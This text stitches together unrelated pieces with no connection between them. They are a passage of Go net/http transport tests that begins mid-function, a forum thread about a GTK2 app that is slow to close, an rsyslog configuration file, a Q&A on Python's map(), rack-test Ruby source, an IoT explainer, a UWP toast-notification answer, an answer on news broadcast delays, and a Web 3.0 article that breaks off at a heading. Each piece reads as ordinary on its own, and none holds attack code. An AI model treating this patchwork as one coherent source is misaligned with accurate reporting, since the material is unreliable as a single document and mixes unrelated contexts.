4855 cst.c.Timeout = time.Minute // just to be non-zero, not to hit it.
4856 req, _ := NewRequest("GET", cst.ts.URL, nil)
4857 cancel := make(chan struct{})
4858 req.Cancel = cancel
4859
4860 res, err := cst.c.Do(req)
4861 if err != nil {
4862 select {
4863 case <-inHandler:
4864 t.Fatalf("Get error: %v", err)
4865 default:
4866 // Failed before entering handler. Ignore result.
4867 t.Skip("skipping test on slow builder")
4868 }
4869 }
4870
4871 close(cancel)
4872 got, err := ioutil.ReadAll(res.Body)
4873 if err == nil {
4874 t.Fatalf("unexpected success; read %q, nil", got)
4875 }
4876
4877 select {
4878 case c := <-inHandler:
4879 select {
4880 case err := <-handlerResult:
4881 if err != nil {
4882 t.Errorf("handler: %v", err)
4883 }
4884 return
4885 case <-time.After(5 * time.Second):
4886 t.Error("Handler's conn.Read seems to be stuck in Read")
4887 c.Close() // close it to unblock Handler
4888 }
4889 case <-time.After(5 * time.Second):
4890 t.Fatal("timeout")
4891 }
4892 }
4893
4894 func TestTransportResponseBodyWritableOnProtocolSwitch(t *testing.T) {
4895 setParallel(t)
4896 defer afterTest(t)
4897 done := make(chan struct{})
4898 defer close(done)
4899 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4900 conn, _, err := w.(Hijacker).Hijack()
4901 if err != nil {
4902 t.Error(err)
4903 return
4904 }
4905 defer conn.Close()
4906 io.WriteString(conn, "HTTP/1.1 101 Switching Protocols Hi\r\nConnection: upgRADe\r\nUpgrade: foo\r\n\r\nSome buffered data\n")
4907 bs := bufio.NewScanner(conn)
4908 bs.Scan()
4909 fmt.Fprintf(conn, "%s\n", strings.ToUpper(bs.Text()))
4910 <-done
4911 }))
4912 defer cst.close()
4913
4914 req, _ := NewRequest("GET", cst.ts.URL, nil)
4915 req.Header.Set("Upgrade", "foo")
4916 req.Header.Set("Connection", "upgrade")
4917 res, err := cst.c.Do(req)
4918 if err != nil {
4919 t.Fatal(err)
4920 }
4921 if res.StatusCode != 101 {
4922 t.Fatalf("expected 101 switching protocols; got %v, %v", res.Status, res.Header)
4923 }
4924 rwc, ok := res.Body.(io.ReadWriteCloser)
4925 if !ok {
4926 t.Fatalf("expected a ReadWriteCloser; got a %T", res.Body)
4927 }
4928 defer rwc.Close()
4929 bs := bufio.NewScanner(rwc)
4930 if !bs.Scan() {
4931 t.Fatalf("expected readable input")
4932 }
4933 if got, want := bs.Text(), "Some buffered data"; got != want {
4934 t.Errorf("read %q; want %q", got, want)
4935 }
4936 io.WriteString(rwc, "echo\n")
4937 if !bs.Scan() {
4938 t.Fatalf("expected another line")
4939 }
4940 if got, want := bs.Text(), "ECHO"; got != want {
4941 t.Errorf("read %q; want %q", got, want)
4942 }
4943 }
4944
4945 func TestTransportCONNECTBidi(t *testing.T) {
4946 defer afterTest(t)
4947 const target = "backend:443"
4948 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4949 if r.Method != "CONNECT" {
4950 t.Errorf("unexpected method %q", r.Method)
4951 w.WriteHeader(500)
4952 return
4953 }
4954 if r.RequestURI != target {
4955 t.Errorf("unexpected CONNECT target %q", r.RequestURI)
4956 w.WriteHeader(500)
4957 return
4958 }
4959 nc, brw, err := w.(Hijacker).Hijack()
4960 if err != nil {
4961 t.Error(err)
4962 return
4963 }
4964 defer nc.Close()
4965 nc.Write([]byte("HTTP/1.1 200 OK\r\n\r\n"))
4966 // Switch to a little protocol that capitalizes its input lines:
4967 for {
4968 line, err := brw.ReadString('\n')
4969 if err != nil {
4970 if err != io.EOF {
4971 t.Error(err)
4972 }
4973 return
4974 }
4975 io.WriteString(brw, strings.ToUpper(line))
4976 brw.Flush()
4977 }
4978 }))
4979 defer cst.close()
4980 pr, pw := io.Pipe()
4981 defer pw.Close()
4982 req, err := NewRequest("CONNECT", cst.ts.URL, pr)
4983 if err != nil {
4984 t.Fatal(err)
4985 }
4986 req.URL.Opaque = target
4987 res, err := cst.c.Do(req)
4988 if err != nil {
4989 t.Fatal(err)
4990 }
4991 defer res.Body.Close()
4992 if res.StatusCode != 200 {
4993 t.Fatalf("status code = %d; want 200", res.StatusCode)
4994 }
4995 br := bufio.NewReader(res.Body)
4996 for _, str := range []string{"foo", "bar", "baz"} {
4997 fmt.Fprintf(pw, "%s\n", str)
4998 got, err := br.ReadString('\n')
4999 if err != nil {
5000 t.Fatal(err)
5001 }
5002 got = strings.TrimSpace(got)
5003 want := strings.ToUpper(str)
5004 if got != want {
5005 t.Fatalf("got %q; want %q", got, want)
5006 }
5007 }
5008 }
5009
5010 func TestTransportRequestReplayable(t *testing.T) {
5011 someBody := ioutil.NopCloser(strings.NewReader(""))
5012 tests := []struct {
5013 name string
5014 req *Request
5015 want bool
5016 }{
5017 {
5018 name: "GET",
5019 req: &Request{Method: "GET"},
5020 want: true,
5021 },
5022 {
5023 name: "GET_http.NoBody",
5024 req: &Request{Method: "GET", Body: NoBody},
5025 want: true,
5026 },
5027 {
5028 name: "GET_body",
5029 req: &Request{Method: "GET", Body: someBody},
5030 want: false,
5031 },
5032 {
5033 name: "POST",
5034 req: &Request{Method: "POST"},
5035 want: false,
5036 },
5037 {
5038 name: "POST_idempotency-key",
5039 req: &Request{Method: "POST", Header: Header{"Idempotency-Key": {"x"}}},
5040 want: true,
5041 },
5042 {
5043 name: "POST_x-idempotency-key",
5044 req: &Request{Method: "POST", Header: Header{"X-Idempotency-Key": {"x"}}},
5045 want: true,
5046 },
5047 {
5048 name: "POST_body",
5049 req: &Request{Method: "POST", Header: Header{"Idempotency-Key": {"x"}}, Body: someBody},
5050 want: false,
5051 },
5052 }
5053 for _, tt := range tests {
5054 t.Run(tt.name, func(t *testing.T) {
5055 got := tt.req.ExportIsReplayable()
5056 if got != tt.want {
5057 t.Errorf("replyable = %v; want %v", got, tt.want)
5058 }
5059 })
5060 }
5061 }
5062
GTK2 app takes 10 seconds to close
AlexTP:
A GTK2 app took 20+ seconds to start and showed an empty window. I gave the user this wiki info:
https://wiki.freepascal.org/CudaText#Unix:_Program_takes_60_seconds_to_start
It solved the slow start!
But the app still waits 10 seconds on closing.
Right before it finally closes, it logs this:
--- Quote ---(cudatext:276516): GLib-CRITICAL **: 16:33:07.945: Source ID 394 was not found when attempting to remove it
--- End quote ---
jamie:
And here I was at the stage of thinking about tooling up a fast PC for Linux! Should I stay away for at least another year?
AlexTP:
That error is hard to reproduce (I cannot reproduce it myself), so keep using Linux unless you actually see it.
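
For readers hitting the same message: that GLib-CRITICAL warning is GLib's standard complaint when g_source_remove() is called with a source ID that no longer exists, for example a timeout source that already removed itself. A minimal PyGObject sketch (added here for illustration, not part of the thread; assumes PyGObject is installed) that reproduces it:

from gi.repository import GLib

loop = GLib.MainLoop()

def on_timeout():
    loop.quit()
    return False  # returning False makes GLib remove the source itself

source_id = GLib.timeout_add(100, on_timeout)  # fire once after 100 ms
loop.run()

# The source already removed itself, so this second removal logs
# "GLib-CRITICAL **: Source ID ... was not found when attempting to remove it".
GLib.source_remove(source_id)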
# /etc/rsyslog.conf Configuration file for rsyslog.
#
# For more information see
# /usr/share/doc/rsyslog-doc/html/rsyslog_conf.html

#################
#### MODULES ####
#################

$ModLoad imuxsock # provides support for local system logging
$ModLoad imklog   # provides kernel logging support
#$ModLoad immark  # provides --MARK-- message capability

# provides UDP syslog reception
#$ModLoad imudp
#$UDPServerRun 514

# provides TCP syslog reception
#$ModLoad imtcp
#$InputTCPServerRun 514

###########################
#### GLOBAL DIRECTIVES ####
###########################

#
# Use traditional timestamp format.
# To enable high precision timestamps, comment out the following line.
#
$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat

#
# Set the default permissions for all log files.
#
$FileOwner root
$FileGroup adm
$FileCreateMode 0640
$DirCreateMode 0755
$Umask 0022

#
# Where to place spool and state files
#
$WorkDirectory /var/spool/rsyslog

#
# Include all config files in /etc/rsyslog.d/
#
$IncludeConfig /etc/rsyslog.d/*.conf

###############
#### RULES ####
###############

#
# First some standard log files. Log by facility.
#
auth,authpriv.*			/var/log/auth.log
*.*;auth,authpriv.none		-/var/log/syslog
#cron.*				/var/log/cron.log
daemon.*			-/var/log/daemon.log
kern.*				-/var/log/kern.log
lpr.*				-/var/log/lpr.log
mail.*				-/var/log/mail.log
user.*				-/var/log/user.log

#
# Logging for the mail system. Split it up so that
# it is easy to write scripts to parse these files.
#
mail.info			-/var/log/mail.info
mail.warn			-/var/log/mail.warn
mail.err			/var/log/mail.err

#
# Logging for INN news system.
#
news.crit			/var/log/news/news.crit
news.err			/var/log/news/news.err
news.notice			-/var/log/news/news.notice

#
# Some "catch-all" log files.
#
*.=debug;\
	auth,authpriv.none;\
	news.none;mail.none	-/var/log/debug
*.=info;*.=notice;*.=warn;\
	auth,authpriv.none;\
	cron,daemon.none;\
	mail,news.none		-/var/log/messages

#
# Emergencies are sent to everybody logged in.
#
*.emerg				*

#
# I like to have messages displayed on the console, but only on a virtual
# console I usually leave idle.
#
#daemon,mail.*;\
#	news.=crit;news.=err;news.=notice;\
#	*.=debug;*.=info;\
#	*.=notice;*.=warn	/dev/tty8

# The named pipe /dev/xconsole is for the `xconsole' utility. To use it,
# you must invoke `xconsole' with the `-file' option:
#
#    $ xconsole -file /dev/xconsole [...]
#
# NOTE: adjust the list below, or you'll go crazy if you have a reasonably
# busy site..
#
daemon.*;mail.*;\
	news.err;\
	*.=debug;*.=info;\
	*.=notice;*.=warn	|/dev/xconsole
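
A quick way to sanity-check a configuration like the one above is rsyslogd's built-in validation mode. A minimal sketch wrapping it from Python (illustration only; -N1 runs a level-1 config check and -f selects the file, and it assumes rsyslogd is installed):

import subprocess

# Run rsyslogd in config-check mode against the file above,
# without starting the daemon.
result = subprocess.run(
    ["rsyslogd", "-N1", "-f", "/etc/rsyslog.conf"],
    capture_output=True, text=True,
)
# rsyslogd prints its verdict to stderr in this mode.
print(result.stderr or result.stdout)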
What does the map method do in Python
0 votes
What is the purpose of using map() function?
Jun 17, 2019 in Python by Wajiha
• 1,950 points
596 views
1 answer to this question.
0 votes
The map() function in Python applies a given function to every item of an iterable and returns a map object with the results, which can be converted to a list.
SYNTAX:
map(function, iterable)
Let’s take an example to demonstrate the use of a lambda function within the map() function:
EXAMPLE:
my_list = [2,3,4,5,6,7,8]
new_list = list(map(lambda a: (a/3 != 2), my_list))
print(new_list)
OUTPUT:
[True, True, True, True, False, True, True]
The above output shows that the lambda returns True whenever an element divided by 3 is not equal to 2. Hence, for every element in my_list the result is True, except for the value 6, where 6/3 equals 2 and the condition evaluates to False.
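For comparison, here is a minimal sketch (my own, not part of the original answer) that does the same thing with a named function and with the equivalent list comprehension; the function name is just illustrative:

# Minimal sketch: map() with a named function instead of a lambda.
my_list = [2, 3, 4, 5, 6, 7, 8]

def not_two_when_divided_by_three(a):
    # True unless a divided by 3 equals 2 (only 6 fails this check)
    return a / 3 != 2

print(list(map(not_two_when_divided_by_three, my_list)))
# [True, True, True, True, False, True, True]

# The equivalent list comprehension gives the same result:
print([a / 3 != 2 for a in my_list])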
answered Jun 17, 2019 by anonymous
Virtual Disk Image
What Does Virtual Disk Image Mean?
A virtual disk image (VDI) is the image of a virtual hard disk or the logical disk associated with a virtual machine.
It is used in virtualization environments to create a replica of the disk space/drive assigned to one or more virtual machines.
Techopedia Explains Virtual Disk Image
VDI is primarily a method to create a copy/image/replica of a virtual machine’s hard disk to be later used for disk backup, restoration or copying to a new virtual machine. The VDI captures and stores all information on the primary disk, typically excluding the operating system files and the virtual machine itself.
In addition to being a disk image of a virtual hard disk, a virtual disk image can also refer to the disk image of a CD, DVD or any other optical disk.
require 'uri'
require 'rack'
require 'rack/mock_session'
require 'rack/test/cookie_jar'
require 'rack/test/mock_digest_request'
require 'rack/test/utils'
require 'rack/test/methods'
require 'rack/test/uploaded_file'
require 'rack/test/version'
module Rack
module Test
DEFAULT_HOST = 'example.org'.freeze
MULTIPART_BOUNDARY = '----------XnJLe9ZIbbGUYtzPQJ16u1'.freeze
# The common base class for exceptions raised by Rack::Test
class Error < StandardError; end
# This class represents a series of requests issued to a Rack app, sharing
# a single cookie jar
#
# Rack::Test::Session's methods are most often called through Rack::Test::Methods,
# which will automatically build a session when it's first used.
class Session
extend Forwardable
include Rack::Test::Utils
def_delegators :@rack_mock_session, :clear_cookies, :set_cookie, :last_response, :last_request
# Creates a Rack::Test::Session for a given Rack app or Rack::MockSession.
#
# Note: Generally, you won't need to initialize a Rack::Test::Session directly.
# Instead, you should include Rack::Test::Methods into your testing context.
# (See README.rdoc for an example)
def initialize(mock_session)
@headers = {}
@env = {}
@digest_username = nil
@digest_password = nil
@rack_mock_session = if mock_session.is_a?(MockSession)
mock_session
else
MockSession.new(mock_session)
end
@default_host = @rack_mock_session.default_host
end
# Issue a GET request for the given URI with the given params and Rack
# environment. Stores the issued request object in #last_request and
# the app's response in #last_response. Yield #last_response to a block
# if given.
#
# Example:
# get "/"
def get(uri, params = {}, env = {}, &block)
custom_request('GET', uri, params, env, &block)
end
# Issue a POST request for the given URI. See #get
#
# Example:
# post "/signup", "name" => "Bryan"
def post(uri, params = {}, env = {}, &block)
custom_request('POST', uri, params, env, &block)
end
# Issue a PUT request for the given URI. See #get
#
# Example:
# put "/"
def put(uri, params = {}, env = {}, &block)
custom_request('PUT', uri, params, env, &block)
end
# Issue a PATCH request for the given URI. See #get
#
# Example:
# patch "/"
def patch(uri, params = {}, env = {}, &block)
custom_request('PATCH', uri, params, env, &block)
end
# Issue a DELETE request for the given URI. See #get
#
# Example:
# delete "/"
def delete(uri, params = {}, env = {}, &block)
custom_request('DELETE', uri, params, env, &block)
end
# Issue an OPTIONS request for the given URI. See #get
#
# Example:
# options "/"
def options(uri, params = {}, env = {}, &block)
custom_request('OPTIONS', uri, params, env, &block)
end
# Issue a HEAD request for the given URI. See #get
#
# Example:
# head "/"
def head(uri, params = {}, env = {}, &block)
custom_request('HEAD', uri, params, env, &block)
end
# Issue a request to the Rack app for the given URI and optional Rack
# environment. Stores the issued request object in #last_request and
# the app's response in #last_response. Yield #last_response to a block
# if given.
#
# Example:
# request "/"
def request(uri, env = {}, &block)
uri = parse_uri(uri, env)
env = env_for(uri, env)
process_request(uri, env, &block)
end
# Issue a request using the given verb for the given URI. See #get
#
# Example:
# custom_request "LINK", "/"
def custom_request(verb, uri, params = {}, env = {}, &block)
uri = parse_uri(uri, env)
env = env_for(uri, env.merge(method: verb.to_s.upcase, params: params))
process_request(uri, env, &block)
end
# Set a header to be included on all subsequent requests through the
# session. Use a value of nil to remove a previously configured header.
#
# In accordance with the Rack spec, headers will be included in the Rack
# environment hash in HTTP_USER_AGENT form.
#
# Example:
# header "User-Agent", "Firefox"
def header(name, value)
if value.nil?
@headers.delete(name)
else
@headers[name] = value
end
end
# Set an env var to be included on all subsequent requests through the
# session. Use a value of nil to remove a previously configured env.
#
# Example:
# env "rack.session", {:csrf => 'token'}
def env(name, value)
if value.nil?
@env.delete(name)
else
@env[name] = value
end
end
# Set the username and password for HTTP Basic authorization, to be
# included in subsequent requests in the HTTP_AUTHORIZATION header.
#
# Example:
# basic_authorize "bryan", "secret"
def basic_authorize(username, password)
encoded_login = ["#{username}:#{password}"].pack('m0')
header('Authorization', "Basic #{encoded_login}")
end
alias authorize basic_authorize
# Set the username and password for HTTP Digest authorization, to be
# included in subsequent requests in the HTTP_AUTHORIZATION header.
#
# Example:
# digest_authorize "bryan", "secret"
def digest_authorize(username, password)
@digest_username = username
@digest_password = password
end
# Rack::Test will not follow any redirects automatically. This method
# will follow the redirect returned (including setting the Referer header
# on the new request) in the last response. If the last response was not
# a redirect, an error will be raised.
def follow_redirect!
unless last_response.redirect?
raise Error, 'Last response was not a redirect. Cannot follow_redirect!'
end
request_method, params =
if last_response.status == 307
[last_request.request_method.downcase.to_sym, last_request.params]
else
[:get, {}]
end
# Compute the next location by appending the location header with the
# last request, as per https://tools.ietf.org/html/rfc7231#section-7.1.2
# Adding two absolute locations returns the right-hand location
next_location = URI.parse(last_request.url) + URI.parse(last_response['Location'])
send(
request_method, next_location.to_s, params,
'HTTP_REFERER' => last_request.url,
'rack.session' => last_request.session,
'rack.session.options' => last_request.session_options
)
end
private
def parse_uri(path, env)
URI.parse(path).tap do |uri|
uri.path = "/#{uri.path}" unless uri.path[0] == '/'
uri.host ||= @default_host
uri.scheme ||= 'https' if env['HTTPS'] == 'on'
end
end
def env_for(uri, env)
env = default_env.merge(env)
env['HTTP_HOST'] ||= [uri.host, (uri.port if uri.port != uri.default_port)].compact.join(':')
env.update('HTTPS' => 'on') if URI::HTTPS === uri
env['HTTP_X_REQUESTED_WITH'] = 'XMLHttpRequest' if env[:xhr]
# TODO: Remove this after Rack 1.1 has been released.
# Stringifying and upcasing methods has been committed upstream
env['REQUEST_METHOD'] ||= env[:method] ? env[:method].to_s.upcase : 'GET'
params = env.delete(:params) do {} end
if env['REQUEST_METHOD'] == 'GET'
# merge :params with the query string
if params
params = parse_nested_query(params) if params.is_a?(String)
uri.query = [uri.query, build_nested_query(params)].compact.reject { |v| v == '' }.join('&')
end
elsif !env.key?(:input)
env['CONTENT_TYPE'] ||= 'application/x-www-form-urlencoded'
if params.is_a?(Hash)
if data = build_multipart(params)
env[:input] = data
env['CONTENT_LENGTH'] ||= data.length.to_s
env['CONTENT_TYPE'] = "#{multipart_content_type(env)}; boundary=#{MULTIPART_BOUNDARY}"
else
# NB: We do not need to set CONTENT_LENGTH here;
# Rack::ContentLength will determine it automatically.
env[:input] = params_to_string(params)
end
else
env[:input] = params
end
end
set_cookie(env.delete(:cookie), uri) if env.key?(:cookie)
Rack::MockRequest.env_for(uri.to_s, env)
end
def multipart_content_type(env)
requested_content_type = env['CONTENT_TYPE']
if requested_content_type.start_with?('multipart/')
requested_content_type
else
'multipart/form-data'
end
end
def process_request(uri, env)
@rack_mock_session.request(uri, env)
if retry_with_digest_auth?(env)
auth_env = env.merge('HTTP_AUTHORIZATION' => digest_auth_header,
'rack-test.digest_auth_retry' => true)
auth_env.delete('rack.request')
process_request(uri, auth_env)
else
yield last_response if block_given?
last_response
end
end
def digest_auth_header
challenge = last_response['WWW-Authenticate'].split(' ', 2).last
params = Rack::Auth::Digest::Params.parse(challenge)
params.merge!('username' => @digest_username,
'nc' => '00000001',
'cnonce' => 'nonsensenonce',
'uri' => last_request.fullpath,
'method' => last_request.env['REQUEST_METHOD'])
params['response'] = MockDigestRequest.new(params).response(@digest_password)
"Digest #{params}"
end
def retry_with_digest_auth?(env)
last_response.status == 401 &&
digest_auth_configured? &&
!env['rack-test.digest_auth_retry']
end
def digest_auth_configured?
@digest_username
end
def default_env
{ 'rack.test' => true, 'REMOTE_ADDR' => '127.0.0.1' }.merge(@env).merge(headers_for_env)
end
def headers_for_env
converted_headers = {}
@headers.each do |name, value|
env_key = name.upcase.tr('-', '_')
env_key = 'HTTP_' + env_key unless env_key == 'CONTENT_TYPE'
converted_headers[env_key] = value
end
converted_headers
end
def params_to_string(params)
case params
when Hash then build_nested_query(params)
when nil then ''
else params
end
end
end
def self.encoding_aware_strings?
defined?(Encoding) && ''.respond_to?(:encode)
end
end
end
Explanations & Tutorials
IoT Explained - How Does an IoT System Actually Work? - Part 2
IoT resources are often highly technical and confusing, so for many it isn't clear how an IoT system actually works.
Calum McClelland
In the first part of IoT Explained - How Does an IoT System Actually Work?, I explained that there are four major components that are involved in any given IoT system. Those components are Sensors/Devices, Connectivity, Data Processing, and User Interface.
Here’s a quick recap of how they work together:
An IoT system consists of sensors/devices which “talk” to the cloud through some kind of connectivity. Once the data gets to the cloud, software processes it and then might decide to perform an action, such as sending an alert or automatically adjusting the sensors/devices without the need for the user.
But if the user input is needed or if the user simply wants to check in on the system, a user interface allows them to do so. Any adjustments or actions that the user makes are then sent in the opposite direction through the system: from the user interface, to the cloud, and back to the sensors/devices to make some kind of change.
IoT Explained: Skipping the Connectivity
The Internet of Things is made up of connected devices, i.e. anything that has the capacity to transfer data over a network. So by definition, an IoT system needs some kind of connectivity, especially if it uses the cloud.
However, there are certain cases where the data processing or the interaction with the sensor/device through the user interface can take place without any data first being transferred over an external network.
Why Skip the Connectivity?
One reason is latency. Latency refers to how long it takes for a packet of data to get from the start point to the end point. Although latency doesn’t matter in the vast majority of cases, for some IoT applications latency is critical.
Imagine you’re in a self-driving car and suddenly somebody loses control of their car in front of you. Would you want to wait for the self-driving car to send data to the cloud, have that data processed, then have instructions for what to do sent back to the car? No! Those milliseconds could mean life or death.
Even if you’re the one driving the car, you want the user interface (i.e the steering wheel) directly hooked up to the device (i.e the car) rather than waiting for your input to be transmitted externally, processed, and then sent back.
Another reason is that sending lots of data can become really expensive. Some IoT applications collect a ton of data, but only a small fraction of it is actually important. Local algorithms can restrict what gets sent, thus lowering costs.
A good example is a security camera. Streaming video takes a lot of data, but the vast majority of the footage might be of an empty hallway.
So How Do You Skip the Connectivity?
Rather than send data over a network for it to be processed in the cloud, an alternative approach is to process the data on a gateway (what’s a gateway?) or on the sensor/device itself. This is called either fog computing or edge computing (because you’re bringing the cloud “closer to the ground” and the computing is taking place at the edges of the IoT system rather than the center).
For the security camera, it could use machine vision to “watch” for anything abnormal and only then send that footage to the cloud.
For the self-driving car, the data processing all takes place in the onboard computer which allows for faster decision-making.
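As a rough illustration of that idea, here is a minimal, hypothetical Python sketch of an edge-side filter for the security-camera case; the frame format, the 10% threshold, and the upload rule are all invented for the example, not taken from any real camera system:

# Hypothetical edge-computing filter: only "upload" a frame when it
# differs enough from the previous one (e.g. motion in an empty hallway).

def frame_changed(prev, curr, threshold=0.10):
    # Mean absolute pixel difference, normalized to 0..1 for 8-bit pixels.
    diff = sum(abs(p - c) for p, c in zip(prev, curr)) / (len(curr) * 255)
    return diff > threshold

def process_stream(frames):
    uploaded = 0
    prev = frames[0]
    for curr in frames[1:]:
        if frame_changed(prev, curr):
            uploaded += 1  # in a real system: send this frame to the cloud
        prev = curr
    return uploaded

# Toy data: 100 mostly identical "frames" (lists of pixel values),
# with a burst of change in the middle.
frames = [[10] * 64 for _ in range(100)]
for i in range(40, 45):
    frames[i] = [200] * 64
print(process_stream(frames), "of 99 frames would be sent")  # only a couple

The point of the sketch is the design choice: the cheap comparison runs on the device, and only the interesting fraction of the data ever touches the network.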
IoT systems are Complex and Varied
Every IoT system combines the four components I discussed in Part 1: Sensors/Devices, Connectivity, Data Processing, and User Interface. However, as you’ve seen in this IoT Explained Part 2, a specific IoT system can combine these components in different ways. It all comes down to the specific situation that needs to be addressed.
Ultimately, IoT systems are meant to improve our everyday experiences and improve our efficiency in whatever way possible. And now you know how an IoT system actually works!
How to trigger buttons after typing something with enter in toast notifications uwp
Alumni Comp 16 LAXMI SWAMI 46 Reputation points
2021-01-28T11:48:19.963+00:00
In a quick-reply toast notification, if I write a quick reply and want to send it, I have to press Reply after typing. Is it possible to make 'Enter' trigger that button?
Also, is it possible to disable a button once the user types anything in the reply textbox?
Universal Windows Platform (UWP)
1 answer
1. AryaDing-MSFT 2,916 Reputation points
2021-01-29T06:01:16.753+00:00
Hi,
Welcome to Microsoft Q&A!
Windows toast notifications use Ctrl+Enter to perform the quick reply and use Enter to add a new line.
Currently, UWP does not provide a way to change this.
Update:
ToastButton.TextBoxId can get or set the ID of an existing ToastTextBox in order to have this button display to the right of the input, achieving a quick reply scenario.
So, this quick reply function depends on you using ToastButton.TextBoxId to make the button behave as a quick reply button. You could set the same Id for the textbox and the button.
For example(ToastButton.TextBoxId and ToastTextBox.Id in the code below are the same, both are "tbReply"):
ToastActionsCustom actions = new ToastActionsCustom()
{
Inputs =
{
new ToastTextBox("tbReply")
{
PlaceholderContent = "Type a response"
}
},
Buttons =
{
new ToastButton("Reply", new QueryString()
{
{ "action", "reply" },
{ "conversationId", conversationId.ToString() }
}.ToString())
{
ActivationType = ToastActivationType.Background,
ImageUri = "Assets/Reply.png",
// Reference the text box's ID in order to quick reply
TextBoxId = "tbReply"
},
……
}
};
If the response is helpful, please click "Accept Answer" and upvote it.
Note: Please follow the steps in our documentation to enable e-mail notifications if you want to receive the related email notification for this thread.
on news channels when theyre asking questions why do they pause and leave like a awkward silence?
596 views
In: Other
This is a delay in the satellite link between the TV studio where the host is located, and the remote location where the answerer is.
Mostly it’s due to a delay in the signal going from the station to the reporter. Along with that, the reporter might also be taking a second to process what was said so they can respond accurately.
This only occurs when their correspondents are at a remote location; it’s due to the delay between the video feed that the studio receives and what the remote team receives. It’s basically like talking to your friend through the phone when it takes 3 seconds for your voice to reach them and vice versa: 3 seconds for the message to arrive, and a couple of seconds to come up with a response.
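For a rough sense of the physics behind that number, here is a back-of-the-envelope Python sketch (my own figures, not from the thread; raw light-travel time is only part of the delay, since encoding, routing, and buffering add the rest):

# Approximate one-hop delay through a geostationary satellite.
ALTITUDE_KM = 36_000        # geostationary orbit, approximately
LIGHT_SPEED_KM_S = 300_000  # speed of light, approximately

one_hop = 2 * ALTITUDE_KM / LIGHT_SPEED_KM_S   # ground -> satellite -> ground
print(f"{one_hop:.2f} s per hop")              # ~0.24 s
print(f"{2 * one_hop:.2f} s for a question to arrive and the answer to start back")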
What Is Web 3.0 (Web3 definition)?
Web 3.0, or Web3, is a set of values and technical applications that define a new era of the World Wide Web. Prime Web 3.0 examples include ubiquity, decentralization, artificial intelligence, blockchain, and connectivity. Learn more about what Web 3.0 means and its key features. Then, get the digital protection you need for your connected life with Avast One.
Web 3.0 gets it. It understands what you mean and the context around how you navigate the web, and it can assemble information in a way similar to humans. Web 3.0 technologies can read between the lines to decipher the intent behind your online requests. According to Web 3.0’s supporters, those deeper insights will transform our digital lives.
But what is Web 3.0, exactly? Let's start at the beginning, with the launch of the World Wide Web, also known as Web 1.0.
Definition of Web 3.0, 2.0, and 1.0
Web 1.0 is the text-based or read-only web, Web 2.0 is the participatory or social web, and Web 3.0 is the open, decentralized, and immersive web.
Web 1.0 was the foundation of the web, and it consisted of static text and images. The next generation, Web 2.0, was defined by interaction and social media. Web 3.0 is the third iteration of the web, defined by open technologies like blockchain and immersive experiences like the metaverse.
Web 1.0
From the early days of static web pages (Web 1.0), to the two-way flow of information (Web 2.0), to the emerging decentralized open internet (Web 3.0), each successive generation of the web has built on top of the previous one, with engineers, designers, and users taking part in defining Web 1.0, 2.0, and 3.0.
The first iteration of the World Wide Web emerged in the late 1980s and early 1990s out of the need for better data sharing among the scientific community. The term “read-only web” was coined by Tim Berners-Lee, because while Web 1.0 made it much easier to exchange information, you couldn’t interact with websites, you could only read them.
The defining characteristic of Web 1.0 was static web pages with no interactivity. You went to a website and read information — the experience was passive. You can see the very first web page of Web 1.0 here.
Web 2.0
Web 2.0 emerged in the early 2000s, taking shape with the emergence of social media. Web 2.0 created spaces for sharing and interactivity, ushering in a new model far beyond the limitations of static web pages.
The defining difference between Web 1 vs Web 2 is the two-way flow of information. People started interacting with websites by sharing information or creating their own content. Think of platforms like Amazon, Google, Facebook, and Twitter, as well as online shopping sites, web forums, P2P gaming sites, and other social media.
What is Web 3.0, exactly?
Web 3.0, also known as Web3, is the third generation of the World Wide Web. Web 3.0 is meant to be decentralized, open to everyone (with a bottom-up design), and built on top of blockchain technologies and developments in the Semantic Web, which describes the web as a network of meaningfully linked data.
Web 3.0 is based on a specific set of principles, technical parameters, and values that distinguish it from earlier iterations of the World Wide Web: Web 2.0 and Web 1.0. Web 3.0 envisions a world without centralized companies, where people are in control of their own data and transactions are transparently recorded on blockchains, or databases searchable by anyone.
Web 2.0 vs Web 3.0
The main distinctions between Web 2.0 and Web 3.0 involve data storage, connectivity, currency, and decentralization. Web 2.0 is about creating content and interacting with websites. Web 3.0 means immersing yourself in the digital experience, and it involves concepts like individual control of personal data, cryptocurrency, and decentralized record keeping on the blockchain.
Whereas Web 2.0 operates on fiat money, Web 3.0 relies on cryptocurrencies and a decentralized finance (DeFi) model. This is part of the decentralization objective, which shifts control from centralized companies or governments to users or the collective. The premise of decentralization extends beyond currency, covering everything from apps to data.
Performance-wise, Web 3.0 will likely be slower than Web 2.0, at least at the beginning. That’s because transactions are processed over multiple servers (independently operated), instead of on one or a group of centralized servers.
It appears that we’re now in the process of moving from Web 2.0 to Web 3.0. In fact, some people say that we’re already living in Web 3.0.
Features of Web 3.0
Web 3.0 is explained best through its features, namely ubiquity, decentralization, artificial intelligence, and semantic web interactivity. Some Web 3.0 technologies have already emerged, such as the decentralized concept that underpins blockchain. Other Web 3.0 meanings are yet to be understood, let alone created.
Blockchain technology was created to facilitate cryptocurrency — the digital currencies that are decentralized (not controlled by central banks) and that are set to play a large role in Web 3.0. Known as Web 3.0 cryptos, these currencies — and other digital assets like NFTs — will be used to incentivize users and service providers, letting people transact directly with one another without having to go through third-parties like conventional banks.
[Image: Illustration of the blockchain process, highlighting how each step is linked to the next]
Ubiquity
Ubiquity means appearing everywhere or being very common. The definition of ubiquity in terms of Web 3.0 refers to the idea that the internet should be accessible from anywhere, through any platform, on any device. Along with digital ubiquity comes the idea of equality. If Web 3.0 is ubiquitous, it means it is not limited. Web 3.0 is not meant for the few, it is meant for the many.
In Web 3.0, anyone can engage from anywhere, and they can contribute through open-source software. Web 2.0 touched on this with the advent of smartphones and greater internet access. If a user posts something on social media, it is essentially “everywhere.” With new gadgets and technology on the horizon, this real-time global connectivity will continue to gain momentum.
Decentralization
Web 3.0 envisions a truly decentralized internet, where connectivity is based completely on peer-to-peer network connections. This decentralized web will rely on blockchain to store data and maintain digital assets without being tracked.
Decentralized apps (Dapps) are also developed based on this concept. Instead of being maintained by a single server, decentralized apps are maintained by a network of computers. Some Dapps already exist using core Web 3.0 technologies.
Decentralized finance (DeFi) is central to DApps and shares many of cryptocurrency’s characteristics, but its applications are even wider. DeFi enables users to invest, save, and ultimately replace pre-existing financial institutions and their top-down modus operandi.
Artificial intelligence
